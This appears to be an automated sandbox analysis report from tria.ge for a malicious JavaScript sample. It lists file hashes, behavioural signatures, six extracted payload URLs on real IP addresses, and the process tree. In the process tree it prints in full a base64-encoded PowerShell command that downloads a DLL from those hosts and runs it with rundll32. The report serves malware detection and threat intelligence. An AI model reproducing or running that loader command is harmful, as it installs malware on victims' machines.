Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
31s -
max time network
33s -
platform
windows7_x64 -
resource
win7-20230220-en -
resource tags
arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system -
submitted
25/03/2023, 01:53
Static task
static1
Behavioral task
behavioral1
Sample
3ea11f515eb42ed351b3e53855097b35dcf00a9faf9fd868299b71fb4e34847e.js
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
3ea11f515eb42ed351b3e53855097b35dcf00a9faf9fd868299b71fb4e34847e.js
Resource
win10v2004-20230220-en
General
-
Target
3ea11f515eb42ed351b3e53855097b35dcf00a9faf9fd868299b71fb4e34847e.js
-
Size
76KB
-
MD5
bdbc96baa80959b9567644cfd9cfa108
-
SHA1
74454032b37ae698615dc3db4d7f4eb47a9aa596
-
SHA256
3ea11f515eb42ed351b3e53855097b35dcf00a9faf9fd868299b71fb4e34847e
-
SHA512
b6c876b7304b8467f46402e449b7951719844d73d18c9f5b06be279f4d26a7c2ff796dc5810158cf771badacf3a2b63689b626b3989604c422280bf718fdcfe4
-
SSDEEP
1536:+GEcysfmIvfU3FGXpF266XPOBgtEc5zOdqBHcnyFfIruavQGWMaMfqRwqwcIkisb:+QysfmIvfU3FGXpF266XPOBgtEc5zOde
Malware Config
Extracted
http://103.214.71.131/gdg77dzSUN7N.dat
http://198.44.140.75/ZDaZZLNJq.dat
http://87.236.146.53/mSVe5fds.dat
http://154.7.253.203/Vodubu.dat
http://137.74.39.237/LM0g9Nw.dat
http://139.180.172.203/ajyMC.dat
Signatures
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 896 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 896 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 1308 wrote to memory of 896 1308 wscript.exe 28 PID 1308 wrote to memory of 896 1308 wscript.exe 28 PID 1308 wrote to memory of 896 1308 wscript.exe 28
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\3ea11f515eb42ed351b3e53855097b35dcf00a9faf9fd868299b71fb4e34847e.js1⤵
- Suspicious use of WriteProcessMemory
PID:1308 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMwA7ACQAUwB0AHIAbwBtAGEAdABvAGwAaQB0AGUATQBlAHQAYQBzAHQAZQByAG4AdQBtACAAPQAgACgAIgBoAHQAdABwADoALwAvADEAMAAzAC4AMgAxADQALgA3ADEALgAxADMAMQAvAGcAZABnADcANwBkAHoAUwBVAE4ANwBOAC4AZABhAHQALABoAHQAdABwADoALwAvADEAOQA4AC4ANAA0AC4AMQA0ADAALgA3ADUALwBaAEQAYQBaAFoATABOAEoAcQAuAGQAYQB0ACwAaAB0AHQAcAA6AC8ALwA4ADcALgAyADMANgAuADEANAA2AC4ANQAzAC8AbQBTAFYAZQA1AGYAZABzAC4AZABhAHQALABoAHQAdABwADoALwAvADEANQA0AC4ANwAuADIANQAzAC4AMgAwADMALwBWAG8AZAB1AGIAdQAuAGQAYQB0ACwAaAB0AHQAcAA6AC8ALwAxADMANwAuADcANAAuADMAOQAuADIAMwA3AC8ATABNADAAZwA5AE4AdwAuAGQAYQB0ACwAaAB0AHQAcAA6AC8ALwAxADMAOQAuADEAOAAwAC4AMQA3ADIALgAyADAAMwAvAGEAagB5AE0AQwAuAGQAYQB0ACIAKQAuAHMAcABsAGkAdAAoACIALAAiACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAFUAbgBkAGUAbgBvAG0AaQBuAGEAdABpAG8AbgBhAGwAaQBzAG0AIABpAG4AIAAkAFMAdAByAG8AbQBhAHQAbwBsAGkAdABlAE0AZQB0AGEAcwB0AGUAcgBuAHUAbQApACAAewB0AHIAeQAgAHsASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAAJABVAG4AZABlAG4AbwBtAGkAbgBhAHQAaQBvAG4AYQBsAGkAcwBtACAALQBUAGkAbQBlAG8AdQB0AFMAZQBjACAAMQA2ACAALQBPACAAJABlAG4AdgA6AFQARQBNAFAAXABTAHUAdAB0AGkAbgBIAGEAcAB1AGsAdQAuAGQAbABsADsAaQBmACAAKAAoAEcAZQB0AC0ASQB0AGUAbQAgACQAZQBuAHYAOgBUAEUATQBQAFwAUwB1AHQAdABpAG4ASABhAHAAdQBrAHUALgBkAGwAbAApAC4AbABlAG4AZwB0AGgAIAAtAGcAZQAgADEAMAAwADAAMAAwACkAIAB7AHMAdABhAHIAdAAgAHIAdQBuAGQAbABsADMAMgAgACQAZQBuAHYAOgBUAEUATQBQAFwAXABTAHUAdAB0AGkAbgBIAGEAcAB1AGsAdQAuAGQAbABsACwARwBMADcAMAA7AGIAcgBlAGEAawA7AH0AfQBjAGEAdABjAGgAIAB7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADMAOwB9AH0A"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:896
-